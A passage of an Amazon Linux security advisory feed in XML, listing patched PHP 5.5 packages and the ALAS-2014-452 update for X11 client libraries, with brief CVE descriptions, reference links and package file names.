</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3710" title="" id="CVE-2014-3710" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-snmp" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.19" release="2.93.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.19-2.93.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.19-2.93.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.19" release="2.93.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.19-2.93.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-452</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-452: medium priority package update for libX11 libXcursor libXfixes libXi libXrandr libXrender libXres libXt libXv libXvMC libXxf86dga libXxf86vm libdmx xorg-x11-proto-devel</title><issued date="2014-11-22 14:00:00" /><updated date="2014-11-24 15:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2066:
Multiple array index errors, leading to heap-based buffer out-of-bounds write flaws, were found in the way various X11 client libraries handled data returned from an X11 server. A malicious X11 server could possibly use this flaw to execute arbitrary code with the privileges of the user running an X11 client.
CVE-2013-2064:
Integer overflow in X.org libxcb 1.9 and earlier allows X servers to trigger allocation of insufficient memory and a buffer overflow via vectors related to the read_packet function.
960367:
CVE-2013-2064 libxcb: Integer overflow leading to heap-based buffer overlow
CVE-2013-2062:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way various X11 client libraries handled certain protocol data. An attacker able to submit invalid protocol data to an X11 server via a malicious X11 client could use either of these flaws to potentially escalate their privileges on the system.
CVE-2013-2005:
A flaw was found in the way the X.Org X11 libXt runtime library used uninitialized pointers. A malicious X11 server could possibly use this flaw to execute arbitrary code with the privileges of the user running an X11 client.
CVE-2013-2004:
Two stack-based buffer overflow flaws were found in the way libX11, the Core X11 protocol client library, processed certain user-specified files. A malicious X11 server could possibly use this flaw to crash an X11 client via a specially crafted file.
CVE-2013-2003:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way various X11 client libraries handled certain protocol data. An attacker able to submit invalid protocol data to an X11 server via a malicious X11 client could use either of these flaws to potentially escalate their privileges on the system.
CVE-2013-2002:
Multiple array index errors, leading to heap-based buffer out-of-bounds write flaws, were found in the way various X11 client libraries handled data returned from an X11 server. A malicious X11 server could possibly use this flaw to execute arbitrary code with the privileges of the user running an X11 client.
CVE-2013-2001:
Multiple array index errors, leading to heap-based buffer out-of-bounds write flaws, were found in the way various X11 client libraries handled data returned from an X11 server. A malicious X11 server could possibly use this flaw to execute arbitrary code with the privileges of the user running an X11 client.
CVE-2013-2000:
Multiple array index errors, leading to heap-based buffer out-of-bounds write flaws, were found in the way various X11 client libraries handled data returned from an X11 server. A malicious X11 server could possibly use this flaw to execute arbitrary code with the privileges of the user running an X11 client.
CVE-2013-1999:
Multiple array index errors, leading to heap-based buffer out-of-bounds write flaws, were found in the way various X11 client libraries handled data returned from an X11 server. A malicious X11 server could possibly use this flaw to execute arbitrary code with the privileges of the user running an X11 client.
CVE-2013-1998:
Multiple array index errors, leading to heap-based buffer out-of-bounds write flaws, were found in the way various X11 client libraries handled data returned from an X11 server. A malicious X11 server could possibly use this flaw to execute arbitrary code with the privileges of the user running an X11 client.
CVE-2013-1997:
Multiple array index errors, leading to heap-based buffer out-of-bounds write flaws, were found in the way various X11 client libraries handled data returned from an X11 server. A malicious X11 server could possibly use this flaw to execute arbitrary code with the privileges of the user running an X11 client.
CVE-2013-1995:
A buffer overflow flaw was found in the way the XListInputDevices() function of X.Org X11's libXi runtime library handled signed numbers. A malicious X11 server could possibly use this flaw to execute arbitrary code with the privileges of the user running an X11 client.
CVE-2013-1991:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way various X11 client libraries handled certain protocol data. An attacker able to submit invalid protocol data to an X11 server via a malicious X11 client could use either of these flaws to potentially escalate their privileges on the system.
CVE-2013-1990:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way various X11 client libraries handled certain protocol data. An attacker able to submit invalid protocol data to an X11 server via a malicious X11 client could use either of these flaws to potentially escalate their privileges on the system.
CVE-2013-1989:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way various X11 client libraries handled certain protocol data. An attacker able to submit invalid protocol data to an X11 server via a malicious X11 client could use either of these flaws to potentially escalate their privileges on the system.
CVE-2013-1988:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way various X11 client libraries handled certain protocol data. An attacker able to submit invalid protocol data to an X11 server via a malicious X11 client could use either of these flaws to potentially escalate their privileges on the system.
CVE-2013-1987:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way various X11 client libraries handled certain protocol data. An attacker able to submit invalid protocol data to an X11 server via a malicious X11 client could use either of these flaws to potentially escalate their privileges on the system.
CVE-2013-1986:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way various X11 client libraries handled certain protocol data. An attacker able to submit invalid protocol data to an X11 server via a malicious X11 client could use either of these flaws to potentially escalate their privileges on the system.
CVE-2013-1985:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way various X11 client libraries handled certain protocol data. An attacker able to submit invalid protocol data to an X11 server via a malicious X11 client could use either of these flaws to potentially escalate their privileges on the system.
CVE-2013-1984:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way various X11 client libraries handled certain protocol data. An attacker able to submit invalid protocol data to an X11 server via a malicious X11 client could use either of these flaws to potentially escalate their privileges on the system.
CVE-2013-1983:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way various X11 client libraries handled certain protocol data. An attacker able to submit invalid protocol data to an X11 server via a malicious X11 client could use either of these flaws to potentially escalate their privileges on the system.
CVE-2013-1982:
Multiple integer overflows in X.org libXext 1.3.1 and earlier allow X servers to trigger allocation of insufficient memory and a buffer overflow via vectors related to the (1) XcupGetReservedColormapEntries, (2) XcupStoreColors, (3) XdbeGetVisualInfo, (4) XeviGetVisualInfo, (5) XShapeGetRectangles, and (6) XSyncListSystemCounters functions.
959046:
CVE-2013-1982 libXext: Multiple integer overflows leading to heap-based buffer-overflows
CVE-2013-1981:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way various X11 client libraries handled certain protocol data. An attacker able to submit invalid protocol data to an X11 server via a malicious X11 client could use either of these flaws to potentially escalate their privileges on the system.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1981" title="" id="CVE-2013-1981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1982" title="" id="CVE-2013-1982" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1983" title="" id="CVE-2013-1983" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1984" title="" id="CVE-2013-1984" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1985" title="" id="CVE-2013-1985" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1986" title="" id="CVE-2013-1986" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1987" title="" id="CVE-2013-1987" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1988" title="" id="CVE-2013-1988" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1989" title="" id="CVE-2013-1989" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1990" title="" id="CVE-2013-1990" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1991" title="" id="CVE-2013-1991" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1995" title="" id="CVE-2013-1995" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1997" title="" id="CVE-2013-1997" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1998" title="" id="CVE-2013-1998" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1999" title="" id="CVE-2013-1999" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2000" title="" id="CVE-2013-2000" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2001" title="" id="CVE-2013-2001" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2002" title="" id="CVE-2013-2002" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2003" title="" id="CVE-2013-2003" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2004" title="" id="CVE-2013-2004" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2005" title="" id="CVE-2013-2005" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2062" title="" id="CVE-2013-2062" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2064" title="" id="CVE-2013-2064" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2066" title="" id="CVE-2013-2066" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1436.html" title="" id="RHSA-2014:1436" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libX11" version="1.6.0" release="2.2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-1.6.0-2.2.12.amzn1.x86_64.rpm</filename></package><package name="libX11-devel" version="1.6.0" release="2.2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-devel-1.6.0-2.2.12.amzn1.x86_64.rpm</filename></package><package name="libX11-common" version="1.6.0" release="2.2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-common-1.6.0-2.2.12.amzn1.x86_64.rpm</filename></package><package name="libX11-debuginfo" version="1.6.0" release="2.2.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/libX11-debuginfo-1.6.0-2.2.12.amzn1.x86_64.rpm</filename></package><package name="libX11-debuginfo" version="1.6.0" release="2.2.12.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-debuginfo-1.6.0-2.2.12.amzn1.i686.rpm</filename></package><package name="libX11" version="1.6.0" release="2.2.12.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-1.6.0-2.2.12.amzn1.i686.rpm</filename></package><package name="libX11-common" version="1.6.0" release="2.2.12.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-common-1.6.0-2.2.12.amzn1.i686.rpm</filename></package><package name="libX11-devel" version="1.6.0" release="2.2.12.amzn1" epoch="0" arch="i686"><filename>Packages/libX11-devel-1.6.0-2.2.12.amzn1.i686.rpm</filename></package><package name="libXcursor-debuginfo" version="1.1.14" release="2.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXcursor-debuginfo-1.1.14-2.1.9.amzn1.x86_64.rpm</filename></package><package name="libXcursor-devel" version="1.1.14" release="2.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXcursor-devel-1.1.14-2.1.9.amzn1.x86_64.rpm</filename></package><package name="libXcursor" version="1.1.14" release="2.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXcursor-1.1.14-2.1.9.amzn1.x86_64.rpm</filename></package><package name="libXcursor-debuginfo" version="1.1.14" release="2.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXcursor-debuginfo-1.1.14-2.1.9.amzn1.i686.rpm</filename></package><package name="libXcursor" version="1.1.14" release="2.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXcursor-1.1.14-2.1.9.amzn1.i686.rpm</filename></package><package name="libXcursor-devel" version="1.1.14" release="2.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXcursor-devel-1.1.14-2.1.9.amzn1.i686.rpm</filename></package><package name="libXfixes-devel" version="5.0.1" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXfixes-devel-5.0.1-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXfixes-debuginfo" version="5.0.1" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXfixes-debuginfo-5.0.1-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXfixes" version="5.0.1" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXfixes-5.0.1-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXfixes" version="5.0.1" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXfixes-5.0.1-2.1.8.amzn1.i686.rpm</filename></package><package name="libXfixes-debuginfo" version="5.0.1" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXfixes-debuginfo-5.0.1-2.1.8.amzn1.i686.rpm</filename></package><package name="libXfixes-devel" version="5.0.1" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXfixes-devel-5.0.1-2.1.8.amzn1.i686.rpm</filename></package><package name="libXrandr-devel" version="1.4.1" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXrandr-devel-1.4.1-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXrandr-debuginfo" version="1.4.1" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXrandr-debuginfo-1.4.1-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXrandr" version="1.4.1" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXrandr-1.4.1-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXrandr-debuginfo" version="1.4.1" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXrandr-debuginfo-1.4.1-2.1.8.amzn1.i686.rpm</filename></package><package name="libXrandr" version="1.4.1" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXrandr-1.4.1-2.1.8.amzn1.i686.rpm</filename></package><package name="libXrandr-devel" version="1.4.1" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXrandr-devel-1.4.1-2.1.8.amzn1.i686.rpm</filename></package><package name="xorg-x11-proto-devel" version="7.7" release="9.10.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-proto-devel-7.7-9.10.amzn1.noarch.rpm</filename></package><package name="libXrender-devel" version="0.9.8" release="2.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXrender-devel-0.9.8-2.1.9.amzn1.x86_64.rpm</filename></package><package name="libXrender" version="0.9.8" release="2.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXrender-0.9.8-2.1.9.amzn1.x86_64.rpm</filename></package><package name="libXrender-debuginfo" version="0.9.8" release="2.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXrender-debuginfo-0.9.8-2.1.9.amzn1.x86_64.rpm</filename></package><package name="libXrender" version="0.9.8" release="2.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXrender-0.9.8-2.1.9.amzn1.i686.rpm</filename></package><package name="libXrender-debuginfo" version="0.9.8" release="2.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXrender-debuginfo-0.9.8-2.1.9.amzn1.i686.rpm</filename></package><package name="libXrender-devel" version="0.9.8" release="2.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXrender-devel-0.9.8-2.1.9.amzn1.i686.rpm</filename></package><package name="libXres-devel" version="1.0.7" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXres-devel-1.0.7-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXres-debuginfo" version="1.0.7" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXres-debuginfo-1.0.7-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXres" version="1.0.7" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXres-1.0.7-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXres-debuginfo" version="1.0.7" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXres-debuginfo-1.0.7-2.1.8.amzn1.i686.rpm</filename></package><package name="libXres" version="1.0.7" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXres-1.0.7-2.1.8.amzn1.i686.rpm</filename></package><package name="libXres-devel" version="1.0.7" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXres-devel-1.0.7-2.1.8.amzn1.i686.rpm</filename></package><package name="libXt-devel" version="1.1.4" release="6.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXt-devel-1.1.4-6.1.9.amzn1.x86_64.rpm</filename></package><package name="libXt" version="1.1.4" release="6.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXt-1.1.4-6.1.9.amzn1.x86_64.rpm</filename></package><package name="libXt-debuginfo" version="1.1.4" release="6.1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXt-debuginfo-1.1.4-6.1.9.amzn1.x86_64.rpm</filename></package><package name="libXt-devel" version="1.1.4" release="6.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXt-devel-1.1.4-6.1.9.amzn1.i686.rpm</filename></package><package name="libXt-debuginfo" version="1.1.4" release="6.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXt-debuginfo-1.1.4-6.1.9.amzn1.i686.rpm</filename></package><package name="libXt" version="1.1.4" release="6.1.9.amzn1" epoch="0" arch="i686"><filename>Packages/libXt-1.1.4-6.1.9.amzn1.i686.rpm</filename></package><package name="libXv-devel" version="1.0.9" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXv-devel-1.0.9-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXv" version="1.0.9" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXv-1.0.9-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXv-debuginfo" version="1.0.9" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXv-debuginfo-1.0.9-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXv-devel" version="1.0.9" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXv-devel-1.0.9-2.1.8.amzn1.i686.rpm</filename></package><package name="libXv-debuginfo" version="1.0.9" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXv-debuginfo-1.0.9-2.1.8.amzn1.i686.rpm</filename></package><package name="libXv" version="1.0.9" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXv-1.0.9-2.1.8.amzn1.i686.rpm</filename></package><package name="libXvMC" version="1.0.8" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXvMC-1.0.8-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXvMC-debuginfo" version="1.0.8" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXvMC-debuginfo-1.0.8-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXvMC-devel" version="1.0.8" release="2.1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXvMC-devel-1.0.8-2.1.8.amzn1.x86_64.rpm</filename></package><package name="libXvMC" version="1.0.8" release="2.1.8.amzn1" epoch="0" arch="i686"><filename>Packages/libXvMC-1.0.8-2.1.8.amzn1.i686.rpm</filename></package><package name="libXvMC-debuginfo" version="1.0.8" 